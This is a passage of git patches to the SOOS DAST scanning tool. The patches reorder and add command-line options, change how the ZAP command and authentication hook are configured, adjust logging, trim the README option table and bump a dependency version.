+      default: FormTypes.Simple,
       required: false,
       type: (value: string) => {
-        if (Object.values(ApiScanFormat).includes(value as ApiScanFormat)) {
-          return value as ApiScanFormat;
+        if (Object.values(FormTypes).includes(value as FormTypes)) {
+          return value as FormTypes;
         } else {
-          throw new Error(`Invalid Api Scan Format: ${value}`);
+          throw new Error(`Invalid submit action: ${value}`);
         }
       },
     });
 
-    parser.add_argument("--authUsername", {
-      help: "Username to use in auth apps.",
-      required: false,
-    });
-
-    parser.add_argument("--authPassword", {
-      help: "Password to use in auth apps.",
-      required: false,
-    });
-
     parser.add_argument("--authLoginURL", {
       help: "Login URL to use in auth apps.",
       required: false,
     });
 
-    parser.add_argument("--authUsernameField", {
-      help: "Username input id to use in auth apps.",
+    parser.add_argument("--authPassword", {
+      help: "Password to use in auth apps.",
       required: false,
     });
 
@@ -170,11 +147,6 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
-    parser.add_argument("--authSubmitField", {
-      help: "Submit button id to use in auth apps.",
-      required: false,
-    });
-
     parser.add_argument("--authSecondSubmitField", {
       help: "Second submit button id to use in auth apps.",
       required: false,
@@ -192,19 +164,19 @@ class SOOSDASTAnalysis {
       },
     });
 
-    parser.add_argument("--authFormType", {
-      help: `Form type of the login URL options are: simple (all fields are displayed at once),
-             wait_for_password (Password field is displayed only after username is filled),
-             or multi_page (Password field is displayed only after username is filled and submit is clicked).`,
-      default: FormTypes.Simple,
+    parser.add_argument("--authSubmitField", {
+      help: "Submit button id to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authUsername", {
+      help: "Username to use in auth apps.",
+      required: false,
+    });
+
+    parser.add_argument("--authUsernameField", {
+      help: "Username input id to use in auth apps.",
       required: false,
-      type: (value: string) => {
-        if (Object.values(FormTypes).includes(value as FormTypes)) {
-          return value as FormTypes;
-        } else {
-          throw new Error(`Invalid submit action: ${value}`);
-        }
-      },
     });
 
     parser.add_argument("--authVerificationURL", {
@@ -212,47 +184,33 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
-    parser.add_argument("--authDelayTime", {
-      help: "Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page)",
-      default: CONSTANTS.AUTH.DELAY_TIME,
+    parser.add_argument("--bearerToken", {
+      help: "Bearer token, adds a Authentication header with the token value.",
       required: false,
     });
 
-    parser.add_argument("--requestCookies", {
-      help: "Set Cookie values for the requests to the target URL",
-      nargs: "*",
+    parser.add_argument("--branchName", {
+      help: "The name of the branch from the SCM System.",
+      default: null,
       required: false,
     });
 
-    parser.add_argument("--requestHeaders", {
-      help: "Set extra headers for the requests to the target URL",
-      nargs: "*",
+    parser.add_argument("--branchURI", {
+      help: "The URI to the branch from the SCM System.",
+      default: null,
       required: false,
     });
 
-    parser.add_argument("--onFailure", {
-      help: "Action to perform when the scan fails. Options: fail_the_build, continue_on_failure.",
-      default: OnFailure.Continue,
+    parser.add_argument("--buildURI", {
+      help: "URI to CI build info.",
+      default: null,
       required: false,
-      type: (value: string) => {
-        if (Object.values(OnFailure).includes(value as OnFailure)) {
-          return value as OnFailure;
-        } else {
-          throw new Error(`Invalid submit action: ${value}`);
-        }
-      },
     });
 
-    parser.add_argument("--outputFormat", {
-      help: "Output format for vulnerabilities: only the value SARIF is available at the moment",
+    parser.add_argument("--buildVersion", {
+      help: "Version of application build artifacts.",
+      default: null,
       required: false,
-      type: (value: string) => {
-        if (value in OutputFormat) {
-          return OutputFormat[value as keyof typeof OutputFormat];
-        } else {
-          throw new Error(`Invalid output format: ${value}`);
-        }
-      },
     });
 
     parser.add_argument("--checkoutDir", {
@@ -261,30 +219,26 @@ class SOOSDASTAnalysis {
       nargs: "*",
     });
 
-    parser.add_argument("--reportRequestHeaders", {
-      help: "Include request/response headers data in report.",
-      default: true,
-      required: false,
-    });
-
-    parser.add_argument("--bearerToken", {
-      help: "Bearer token, adds a Authentication header with the token value.",
+    parser.add_argument("--clientId", {
+      help: "SOOS Client ID - get yours from https://app.soos.io/integrate/sca",
+      default: getEnvVariable(CONSTANTS.SOOS.CLIENT_ID_ENV_VAR),
       required: false,
     });
 
-    parser.add_argument("--oauthTokenUrl", {
-      help: "The authentication URL to use to obtain an OAuth token.",
+    parser.add_argument("--commitHash", {
+      help: "The commit hash value from the SCM System.",
+      default: null,
       required: false,
     });
 
-    parser.add_argument("--oauthParameters", {
-      help: 'Parameters to be added to the oauth token request. (eg --oauthParameters="client_id:clientID, client_secret:clientSecret, grant_type:client_credentials")',
-      required: false,
+    parser.add_argument("--contextFile", {
+      help: "Context file which will be loaded prior to scanning the target.",
       nargs: "*",
+      required: false,
     });
 
-    parser.add_argument("--updateAddons", {
-      help: "Internal use only. Update ZAP addons.",
+    parser.add_argument("--debug", {
+      help: "Enable debug logging for ZAP.",
       action: "store_true",
       required: false,
     });
@@ -295,14 +249,19 @@ class SOOSDASTAnalysis {
       nargs: "*",
     });
 
-    parser.add_argument("--otherOptions", {
-      help: "Other Options to pass to zap.",
+    parser.add_argument("--fullScanMinutes", {
+      help: "Number of minutes for the spider to run.",
+      default: 120,
       required: false,
     });
 
-    parser.add_argument("--apiURL", {
-      help: "SOOS API URL - Intended for internal use only, do not modify.",
-      default: "https://api.soos.io/api/",
+    parser.add_argument("--integrationName", {
+      help: "Integration Name - Intended for internal use only.",
+      required: false,
+    });
+
+    parser.add_argument("--integrationType", {
+      help: "Integration Type - Intended for internal use only.",
       required: false,
     });
 
@@ -319,59 +278,79 @@ class SOOSDASTAnalysis {
       },
     });
 
-    parser.add_argument("--integrationName", {
-      help: "Integration Name - Intended for internal use only.",
+    parser.add_argument("--onFailure", {
+      help: "Action to perform when the scan fails. Options: fail_the_build, continue_on_failure.",
+      default: OnFailure.Continue,
       required: false,
+      type: (value: string) => {
+        if (Object.values(OnFailure).includes(value as OnFailure)) {
+          return value as OnFailure;
+        } else {
+          throw new Error(`Invalid submit action: ${value}`);
+        }
+      },
     });
 
-    parser.add_argument("--integrationType", {
-      help: "Integration Type - Intended for internal use only.",
+    parser.add_argument("--operatingEnvironment", {
+      help: "Set Operating environment for information purposes only.",
+      default: null,
       required: false,
     });
 
-    parser.add_argument("--scriptVersion", {
-      help: "Script Version - Intended for internal use only.",
-      required: false,
+    parser.add_argument("targetURL", {
+      help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
     });
 
-    parser.add_argument("--appVersion", {
-      help: "App Version - Intended for internal use only.",
+    parser.add_argument("--outputFormat", {
+      help: "Output format for vulnerabilities: only the value SARIF is available at the moment",
       required: false,
+      type: (value: string) => {
+        if (value in OutputFormat) {
+          return OutputFormat[value as keyof typeof OutputFormat];
+        } else {
+          throw new Error(`Invalid output format: ${value}`);
+        }
+      },
     });
 
-    parser.add_argument("--commitHash", {
-      help: "The commit hash value from the SCM System.",
-      default: null,
-      required: false,
+    parser.add_argument("--projectName", {
+      help: "Project Name - this is what will be displayed in the SOOS app.",
+      required: true,
     });
 
-    parser.add_argument("--branchName", {
-      help: "The name of the branch from the SCM System.",
-      default: null,
+    parser.add_argument("--requestCookies", {
+      help: "Set Cookie values for the requests to the target URL",
+      nargs: "*",
       required: false,
     });
 
-    parser.add_argument("--branchURI", {
-      help: "The URI to the branch from the SCM System.",
-      default: null,
+    parser.add_argument("--requestHeaders", {
+      help: "Set extra headers for the requests to the target URL",
+      nargs: "*",
       required: false,
     });
 
-    parser.add_argument("--buildVersion", {
-      help: "Version of application build artifacts.",
-      default: null,
+    parser.add_argument("--reportRequestHeaders", {
+      help: "Include request/response headers data in report.",
+      default: true,
       required: false,
     });
 
-    parser.add_argument("--buildURI", {
-      help: "URI to CI build info.",
-      default: null,
+    parser.add_argument("--scanMode", {
+      help: "Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes)",
+      default: ScanMode.Baseline,
       required: false,
+      type: (value: string) => {
+        if (Object.values(ScanMode).includes(value as ScanMode)) {
+          return value as ScanMode;
+        } else {
+          throw new Error(`Invalid scan mode: ${value}`);
+        }
+      },
     });
 
-    parser.add_argument("--operatingEnvironment", {
-      help: "Set Operating environment for information purposes only.",
-      default: null,
+    parser.add_argument("--scriptVersion", {
+      help: "Script Version - Intended for internal use only.",
       required: false,
     });
 
@@ -400,8 +379,8 @@ class SOOSDASTAnalysis {
         commitHash: this.args.commitHash,
         branch: this.args.branchName,
         buildVersion: this.args.buildVersion,
-        buildUri: this.args.buildUri,
-        branchUri: this.args.branchUri,
+        buildUri: this.args.buildURI,
+        branchUri: this.args.branchURI,
         integrationType: this.args.integrationType,
         operatingEnvironment: this.args.operatingEnvironment,
         integrationName: this.args.integrationName,
@@ -456,7 +435,7 @@ class SOOSDASTAnalysis {
       formData.append("resultVersion", data["@version"]);
       formData.append(
         "file",
-        convertStringToB64(
+        convertStringToBase64(
           JSON.stringify(
             JSON.parse(
               fs.readFileSync(
@@ -543,7 +522,7 @@ class SOOSDASTAnalysis {
     if (!status.isComplete) {
       soosLogger.info(`Scan status: ${status.status}...`);
       if (attempt >= CONSTANTS.STATUS.MAX_ATTEMPTS) {
-        soosLogger.error("Max attempts reached. for fetching scan status.");
+        soosLogger.error("Max attempts reached fetching scan status.");
         soosLogger.error("Failing the build.");
         process.exit(1);
       }
diff --git a/src/utils/ZAPCommandGenerator.ts b/src/utils/ZAPCommandGenerator.ts
index 52e42e3..59895d5 100644
--- a/src/utils/ZAPCommandGenerator.ts
+++ b/src/utils/ZAPCommandGenerator.ts
@@ -19,38 +19,40 @@ export class ZAPCommandGenerator {
   }
 
   private addHookParams() {
+    this.addEnvironmentVariable("AUTH_ACTION", this.config.authSubmitAction);
+    this.addEnvironmentVariable("AUTH_BEARER_TOKEN", this.config.bearerToken);
+    this.addEnvironmentVariable("AUTH_DELAY_TIME", this.config.authDelayTime);
+    this.addEnvironmentVariable("AUTH_FORM_TYPE", this.config.authFormType);
     this.addEnvironmentVariable("AUTH_LOGIN_URL", this.config.authLoginURL);
-    this.addEnvironmentVariable("AUTH_USERNAME", this.config.authUsername);
     this.addEnvironmentVariable("AUTH_PASSWORD", this.config.authPassword);
-    this.addEnvironmentVariable("CUSTOM_COOKIES", this.config.requestCookies);
-    this.addEnvironmentVariable("CUSTOM_HEADER", this.config.requestHeaders);
-    this.addEnvironmentVariable("AUTH_BEARER_TOKEN", this.config.bearerToken);
-    this.addEnvironmentVariable("AUTH_SUBMIT_FIELD", this.config.authSubmitField);
+    this.addEnvironmentVariable("AUTH_PASSWORD_FIELD", this.config.authPasswordField);
     this.addEnvironmentVariable("AUTH_SECOND_SUBMIT_FIELD", this.config.authSecondSubmitField);
     this.addEnvironmentVariable("AUTH_SUBMIT_ACTION", this.config.authSubmitAction);
-    this.addEnvironmentVariable("AUTH_FORM_TYPE", this.config.authFormType);
-    this.addEnvironmentVariable("AUTH_DELAY_TIME", this.config.authDelayTime);
-    this.addEnvironmentVariable("AUTH_VERIFICATION_URL", this.config.authVerificationURL);
+    this.addEnvironmentVariable("AUTH_SUBMIT_FIELD", this.config.authSubmitField);
+    this.addEnvironmentVariable("AUTH_USERNAME", this.config.authUsername);
     this.addEnvironmentVariable("AUTH_USERNAME_FIELD", this.config.authUsernameField);
-    this.addEnvironmentVariable("AUTH_PASSWORD_FIELD", this.config.authPasswordField);
-    this.addEnvironmentVariable("OAUTH_TOKEN_URL", this.config.oauthTokenUrl);
-    this.addEnvironmentVariable("OAUTH_PARAMETERS", this.config.oauthParameters);
+    this.addEnvironmentVariable("AUTH_VERIFICATION_URL", this.config.authVerificationURL);
+    this.addEnvironmentVariable("CUSTOM_COOKIES", this.config.requestCookies);
+    this.addEnvironmentVariable("CUSTOM_HEADER", this.config.requestHeaders);
     this.addEnvironmentVariable("DISABLE_RULES", this.config.disableRules);
+    this.addEnvironmentVariable("OAUTH_PARAMETERS", this.config.oauthParameters);
+    this.addEnvironmentVariable("OAUTH_TOKEN_URL", this.config.oauthTokenUrl);
   }
 
   private generateCommand(args: string[]): string {
-    this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, CONSTANTS.ZAP.AJAX_SPIDER_OPTION, this.config.ajaxSpider);
     this.addOption(args, CONSTANTS.ZAP.CONTEXT_FILE_OPTION, this.config.contextFile);
     this.addOption(args, CONSTANTS.ZAP.DEBUG_OPTION, this.config.debug);
-    this.addOption(args, CONSTANTS.ZAP.AJAX_SPIDER_OPTION, this.config.ajaxSpider);
-    this.addOption(args, CONSTANTS.ZAP.SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
+    this.addOption(args, CONSTANTS.ZAP.HOOK_OPTION, CONSTANTS.FILES.ZAP_CUSTOM_HOOK_SCRIPT);
     this.addOption(
       args,
       CONSTANTS.ZAP.JSON_REPORT_OPTION,
       CONSTANTS.FILES.REPORT_SCAN_RESULT_FILENAME
     );
     this.addOption(args, CONSTANTS.ZAP.OPTIONS, this.config.otherOptions);
-    this.addOption(args, CONSTANTS.ZAP.HOOK_OPTION, CONSTANTS.FILES.ZAP_CUSTOM_HOOK_SCRIPT);
+    this.addOption(args, CONSTANTS.ZAP.SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
+    this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
+
     this.addHookParams();
 
     return args.join(" ");

From 8d78a815e5e95be944b04334a4289f3f317c17e1 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 12:35:55 -0300
Subject: [PATCH 09/26] improve logging inside hook

---
 package-lock.json                       |  8 ++++----
 package.json                            |  2 +-
 src/zap_hooks/helpers/auth_context.py   | 14 ++------------
 src/zap_hooks/helpers/custom_cookies.py |  2 +-
 src/zap_hooks/soos_zap_hook.py          | 11 ++++++++---
 5 files changed, 16 insertions(+), 21 deletions(-)

diff --git a/package-lock.json b/package-lock.json
index 7b89dad..a300978 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -9,7 +9,7 @@
       "version": "2.0.0",
       "license": "MIT",
       "dependencies": {
-        "@soos-io/api-client": "0.1.5-pre.7",
+        "@soos-io/api-client": "0.1.5-pre.9",
         "argparse": "^2.0.1",
         "axios": "^0.27.2",
         "tslib": "^2.6.2",
@@ -24,9 +24,9 @@
       }
     },
     "node_modules/@soos-io/api-client": {
-      "version": "0.1.5-pre.7",
-      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.7.tgz",
-      "integrity": "sha512-RtCLYg+XYXheuZqqRNdxw5XuSKkn1RK5CrPr7Xe7TSiZ3sW1I770vUnV8NQgfku5AdQYwRqmKX39WkIQQC6akQ==",
+      "version": "0.1.5-pre.9",
+      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.9.tgz",
+      "integrity": "sha512-jK79S/e+D3eKjndf9avqN9XC1ustI4ZUMDEDVIs5+8agWw7YOcqYfx4yNehXX1Te67KSNscNQYdpntoRXSgtag==",
       "dependencies": {
         "axios": "^0.27.2",
         "tslib": "^2.6.2"
diff --git a/package.json b/package.json
index 3871416..d9baab0 100644
--- a/package.json
+++ b/package.json
@@ -17,7 +17,7 @@
     "check": "npm run format && npm run typecheck && npm run test"
   },
   "dependencies": {
-    "@soos-io/api-client": "0.1.5-pre.7",
+    "@soos-io/api-client": "0.1.5-pre.9",
     "argparse": "^2.0.1",
     "axios": "^0.27.2",
     "tslib": "^2.6.2",
diff --git a/src/zap_hooks/helpers/auth_context.py b/src/zap_hooks/helpers/auth_context.py
index 32eceb4..5e755d1 100644
--- a/src/zap_hooks/helpers/auth_context.py
+++ b/src/zap_hooks/helpers/auth_context.py
@@ -79,16 +79,13 @@ def setup_webdriver() -> webdriver.Chrome:
     return driver
 
 def authenticate(zap, target, config):
-    skip_cleanup = False
     try:
         if zap is not None:
             setup_context(zap, target, config)
 
         if config.auth_login_url:
             driver_instance = setup_webdriver()
-
             login(driver_instance, config)
-
             set_authentication(zap, target, driver_instance, config)
         elif config.auth_bearer_token:
             add_authorization_header(
@@ -97,20 +94,13 @@ def authenticate(zap, target, config):
             login_from_token_endpoint(zap, config)
         elif config.oauth_token_url:
             login_from_oauth_token_url(zap, config)
-        else:
-            skip_cleanup = True
-            log(
-                'No login URL, Token Endpoint or Bearer token provided - skipping authentication',
-                log_level=LogLevel.WARN
-            )
 
     except Exception:
         log(f"error in authenticate: {print_exc()}", log_level=LogLevel.ERROR)
     finally:
         if config.auth_verification_url:
-            validate_authentication_url(driver_instance, config.auth_verification_url)
-        if not skip_cleanup:            
-            cleanup(driver_instance)
+            validate_authentication_url(driver_instance, config.auth_verification_url)         
+        cleanup(driver_instance)
 
 def set_authentication(zap, target, driver, config):
     log('Finding authentication cookies')
diff --git a/src/zap_hooks/helpers/custom_cookies.py b/src/zap_hooks/helpers/custom_cookies.py
index daa9043..87f6092 100644
--- a/src/zap_hooks/helpers/custom_cookies.py
+++ b/src/zap_hooks/helpers/custom_cookies.py
@@ -8,8 +8,8 @@
 
 
 def load(config: DASTConfig, zap):
-    log(f"loading cookies: {config.cookies}")
     if config.cookies:
+        log(f"loading cookies: {config.cookies}")
         script_name: str = 'request_cookies'
         request_cookies_script_path = f"{ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH}{script_name}.js"
 
diff --git a/src/zap_hooks/soos_zap_hook.py b/src/zap_hooks/soos_zap_hook.py
index f3faf16..ce16c26 100644
--- a/src/zap_hooks/soos_zap_hook.py
+++ b/src/zap_hooks/soos_zap_hook.py
@@ -4,7 +4,7 @@
 
 from src.zap_hooks.helpers.auth_context import authenticate
 from src.zap_hooks.helpers.configuration import DASTConfig
-from src.zap_hooks.helpers.utilities import log, exit_app
+from src.zap_hooks.helpers.utilities import log, exit_app, LogLevel
 from src.zap_hooks.helpers import custom_cookies as cookies
 from src.zap_hooks.helpers import custom_headers as headers
 from src.zap_hooks.helpers import constants as Constants
@@ -39,8 +39,13 @@ def zap_started(zap, target):
             zap.pscan.disable_scanners(','.join(pscan_disabled_rules))
             zap.ascan.disable_scanners(','.join(ascan_disabled_rules), Constants.ZAP_ACTIVE_SCAN_POLICY_NAME)
             log(f"disabled rules: {config.disable_rules}")
-
-        authenticate(zap, target, config)
+        if config.auth_login_url or config.auth_bearer_token or config.auth_token_endpoint or config.oauth_token_url:
+            authenticate(zap, target, config)
+        else:
+            log(
+                'No login URL, Token Endpoint or Bearer token provided - skipping authentication',
+                log_level=LogLevel.WARN
+            )
         cookies.load(config, zap)
         headers.load(config, zap)
     except Exception:

From 9f619242330415f240e1972bbb6eb3da2b591cd9 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 13:23:10 -0300
Subject: [PATCH 10/26] logging as close as possible to python one

---
 src/index.ts                     | 34 ++++++++++++++++++++++++--------
 src/zap_hooks/helpers/logging.py |  6 +++---
 2 files changed, 29 insertions(+), 11 deletions(-)

diff --git a/src/index.ts b/src/index.ts
index 34c2e7c..112d686 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -371,7 +371,18 @@ class SOOSDASTAnalysis {
     let analysisId: string | undefined;
     const soosApiClient = new SOOSAnalysisApiClient(this.args.apiKey, this.args.apiURL);
     try {
-      soosLogger.info("Starting SOOS DAST Analysis");
+      soosLogger.info(`Project Name: ${this.args.projectName}`);
+      soosLogger.info(`Scan Mode: ${this.args.scanMode}`);
+      soosLogger.info(`API URL: ${this.args.apiURL}`);
+      soosLogger.info(`Target URL: ${this.args.targetURL}`);
+      soosLogger.logLineSeparator();
+
+      soosLogger.info(`Checking if url '${this.args.targetURL}' is available...`);
+      if (!(await isUrlAvailable(this.args.targetURL))) {
+        soosLogger.error(`The URL ${this.args.targetURL} is not available.`);
+        exit(1);
+      }
+
       soosLogger.info(`Creating scan for project ${this.args.projectName}...`);
       const result = await soosApiClient.createScan({
         clientId: this.args.clientId,
@@ -395,12 +406,6 @@ class SOOSDASTAnalysis {
       branchHash = result.branchHash;
       analysisId = result.analysisId;
 
-      soosLogger.info(`Checking if url '${this.args.targetURL}' is available...`);
-      if (!(await isUrlAvailable(this.args.targetURL))) {
-        soosLogger.error(`The URL ${this.args.targetURL} is not available.`);
-        exit(1);
-      }
-
       execSync("mkdir -p ~/.ZAP/reports /root/.ZAP/reports");
 
       if (this.args.reportRequestHeaders) {
@@ -447,6 +452,8 @@ class SOOSDASTAnalysis {
         ),
         "base64Manifest"
       );
+      soosLogger.logLineSeparator();
+      soosLogger.info(`Starting report results processing`);
       soosLogger.info(`Uploading scan result for project ${this.args.projectName}...`);
       await soosApiClient.uploadScanToolResult({
         clientId: this.args.clientId,
@@ -456,6 +463,7 @@ class SOOSDASTAnalysis {
         scanId: analysisId,
         resultFile: formData,
       });
+      soosLogger.info(`Scan result uploaded successfully`);
 
       scanDone = true;
 
@@ -491,6 +499,10 @@ class SOOSDASTAnalysis {
           attempt: 0,
         });
       }
+
+      soosLogger.logLineSeparator();
+      soosLogger.info(`SOOS DAST Analysis finished successfully`);
+      soosLogger.info(`Project URL: ${result.scanUrl}`);
     } catch (error) {
       soosLogger.error(error);
       if (projectHash && branchHash && analysisId && !scanDone)
@@ -553,7 +565,8 @@ class SOOSDASTAnalysis {
 
   static async runZap(command: string): Promise<void> {
     return new Promise((resolve, reject) => {
-      console.log("Running ZAP");
+      soosLogger.logLineSeparator();
+      soosLogger.info("Running ZAP");
       const zapProcess = spawn(command, {
         shell: true,
         stdio: "inherit",
@@ -570,10 +583,15 @@ class SOOSDASTAnalysis {
   }
 
   static async createAndRun(): Promise<void> {
+    soosLogger.info("Starting SOOS DAST Analysis");
+    soosLogger.logLineSeparator();
     try {
       const args = this.parseArgs();
       soosLogger.setMinLogLevel(args.logLevel);
       soosLogger.setVerbose(args.verbose);
+      soosLogger.info("Configuration read");
+      soosLogger.verboseDebug(args);
+      soosLogger.logLineSeparator();
       const soosDASTAnalysis = new SOOSDASTAnalysis(args);
       await soosDASTAnalysis.runAnalysis();
     } catch (error) {
diff --git a/src/zap_hooks/helpers/logging.py b/src/zap_hooks/helpers/logging.py
index d1080e2..e32d4a6 100644
--- a/src/zap_hooks/helpers/logging.py
+++ b/src/zap_hooks/helpers/logging.py
@@ -35,14 +35,14 @@ def emit(self, record):
         if self.is_tty and colorize:
             color, attr = self.level_map[record.levelno]
             prefix = colored(
-                str("[" + record.levelname + "]").ljust(18), color, attrs=attr
+                str("[" + record.levelname + "]"), color, attrs=attr
             )
             if hasattr(record, "highlight") and record.highlight:
                 record.msg = colored(record.msg, color, attrs=["bold", "reverse"])
         else:
-            prefix = str("[" + record.levelname + "]").ljust(18)
+            prefix = str("[" + record.levelname + "]")
 
-        record.msg = prefix + record.msg
+        record.msg = f"{prefix} {record.msg}"
 
         logging.StreamHandler.emit(self, record)
 class CustomFormatter(logging.Formatter):

From 883f4384d200e248a389ef3ff49d662bc38cff5c Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 15:01:17 -0300
Subject: [PATCH 11/26] wire up other options, fix zapOptions

---
 src/index.ts                     | 13 +++++++++++++
 src/utils/ZAPCommandGenerator.ts |  7 +++++--
 2 files changed, 18 insertions(+), 2 deletions(-)

diff --git a/src/index.ts b/src/index.ts
index 112d686..9def173 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -68,6 +68,7 @@ export interface SOOSDASTAnalysisArgs {
   targetURL: string;
   updateAddons: boolean;
   verbose: boolean;
+  zapOptions: string;
 }
 
 class SOOSDASTAnalysis {
@@ -301,6 +302,12 @@ class SOOSDASTAnalysis {
       help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
     });
 
+    parser.add_argument("--otherOptions", {
+      help: "Other command line arguments sent directly to the script for items not supported by other command line arguments",
+      required: false,
+      nargs: "*",
+    });
+
     parser.add_argument("--outputFormat", {
       help: "Output format for vulnerabilities: only the value SARIF is available at the moment",
       required: false,
@@ -360,6 +367,12 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
+    parser.add_argument("--zapOptions", {
+      help: "Additional ZAP Options",
+      required: false,
+      nargs: "*",
+    });
+
     soosLogger.info("Parsing arguments");
     return parser.parse_args();
   }
diff --git a/src/utils/ZAPCommandGenerator.ts b/src/utils/ZAPCommandGenerator.ts
index 59895d5..a6522e1 100644
--- a/src/utils/ZAPCommandGenerator.ts
+++ b/src/utils/ZAPCommandGenerator.ts
@@ -49,12 +49,15 @@ export class ZAPCommandGenerator {
       CONSTANTS.ZAP.JSON_REPORT_OPTION,
       CONSTANTS.FILES.REPORT_SCAN_RESULT_FILENAME
     );
-    this.addOption(args, CONSTANTS.ZAP.OPTIONS, this.config.otherOptions);
+    this.addOption(args, CONSTANTS.ZAP.OPTIONS, this.config.zapOptions);
     this.addOption(args, CONSTANTS.ZAP.SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
     this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
-
     this.addHookParams();
 
+    if (this.config.otherOptions) {
+      args.push(this.config.otherOptions);
+    }
+
     return args.join(" ");
   }
 

From 53a6f3e3f544f5a7302aa8b470963e872879e7aa Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 15:26:50 -0300
Subject: [PATCH 12/26] update param descriptions and readme

---
 README.md         | 28 +---------------------------
 package-lock.json |  8 ++++----
 package.json      |  2 +-
 src/index.ts      |  2 +-
 4 files changed, 7 insertions(+), 33 deletions(-)

diff --git a/README.md b/README.md
index 100dd21..9e398be 100644
--- a/README.md
+++ b/README.md
@@ -32,25 +32,19 @@ The basic command to run a baseline scan would look like:
 | Argument | Default | Description |
 | --- | --- | --- |
 | `-h`, `--help` | ==SUPPRESS== | show this help message and exit |
-| `-hf`, `--helpFormatted` | False | Print the --help command in markdown table format |
-| `--configFile` | None | Config File - SOOS yaml file with all the configuration for the DAST Analysis (See https://github.com/soos-io/soos-dast#config-file-definition) |
 | `--clientId` | None | SOOS Client ID - get yours from https://app.soos.io/integrate/sca |
 | `--apiKey` | None | SOOS API Key - get yours from https://app.soos.io/integrate/sca |
 | `--projectName` | None | Project Name - this is what will be displayed in the SOOS app |
 | `--scanMode` | baseline | Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes) |
-| `--debug` | False | Enable to show debug messages. |
+| `--debug` | False | Enable debug logging for ZAP. |
 | `--ajaxSpider` | None | Ajax Spider - Use the ajax spider in addition to the traditional one. Additional information: https://www.zaproxy.org/docs/desktop/addons/ajax-spider/ |
-| `--rules` | None | Rules file to use to INFO, IGNORE or FAIL warnings |
 | `--contextFile` | None | Context file which will be loaded prior to scanning the target |
-| `--contextUser` | None | Username to use for authenticated scans - must be defined in the given context file |
 | `--fullScanMinutes` | None | Number of minutes for the spider to run |
 | `--apiScanFormat` | None | Target API format: OpenAPI, SOAP, or GraphQL |
-| `--level` | INFO | Log level to show: DEBUG, INFO, WARN, ERROR, CRITICAL |
 | `--integrationName` | None | Integration Name - Intended for internal use only. |
 | `--integrationType` | None | Integration Type - Intended for internal use only. |
 | `--scriptVersion` | None | Script Version - Intended for internal use only. |
 | `--appVersion` | None | App Version - Intended for internal use only. |
-| `--authDisplay` | None | Minimum level to show: PASS, IGNORE, INFO, WARN or FAIL |
 | `--authUsername` | None | Username to use in auth apps |
 | `--authPassword` | None | Password to use in auth apps |
 | `--authLoginURL` | None | Login url to use in auth apps |
@@ -73,33 +67,13 @@ The basic command to run a baseline scan would look like:
 | `--operatingEnvironment` | None | Set Operating environment for information purposes only |
 | `--reportRequestHeaders` | True | Include request/response headers data in report |
 | `--outputFormat` | None | Output format for vulnerabilities: only the value SARIF is available at the moment |
-| `--gpat` | None | GitHub Personal Authorization Token |
 | `--bearerToken` | None | Bearer token to authenticate |
 | `--checkoutDir` | None | Checkout directory to locate SARIF report |
-| `--sarifDestination` | None | SARIF destination to upload report in the form of <repo_owner>/<repo_name> |
-| `--sarif` | None | DEPRECATED - SARIF parameter is currently deprecated, please use --outputFormat='sarif' instead |
 | `--oauthTokenUrl` | None | The authentication URL that grants the access_token. |
 | `--oauthParameters` | None | Parameters to be added to the oauth token request. (eg --oauthParameters="client_id:clientID, client_secret:clientSecret, grant_type:client_credentials")
 | `--disableRules` | None | Comma separated list of ZAP rules IDs to disable. List for reference https://www.zaproxy.org/docs/alerts/ |
 | `--otherOptions` | None | Additional command line arguments for items not supported by the set of parameters above |
 
-#### Config File Definition
-``` yaml
-config:
-  clientId: 'SOOS_CLIENT_ID' # Required - SOOS Client Id provided by the Application
-  apiKey: 'SOOS_API_KEY' # Required - SOOS API Key provided by the Application
-  projectName: 'Project Name' # Required
-  scanMode: 'baseline' # Required - DAST Scan mode. Values available: baseline, fullscan, and apiscan
-  debug: true # Optional - Enable console log debugging. Default: false 
-  ajaxSpider: false # Optional - Enable Ajax Spider scanning - Useful for Modern Web Apps
-  rules: '' # Optional - 
-  context:
-    file: '' # Optional
-    user: '' # Optional
-  apiScan:
-    format: 'openapi'
-```
-
 ## Scan Modes
 
 ### Baseline
diff --git a/package-lock.json b/package-lock.json
index a300978..919082c 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -9,7 +9,7 @@
       "version": "2.0.0",
       "license": "MIT",
       "dependencies": {
-        "@soos-io/api-client": "0.1.5-pre.9",
+        "@soos-io/api-client": "0.1.5",
         "argparse": "^2.0.1",
         "axios": "^0.27.2",
         "tslib": "^2.6.2",
@@ -24,9 +24,9 @@
       }
     },
     "node_modules/@soos-io/api-client": {
-      "version": "0.1.5-pre.9",
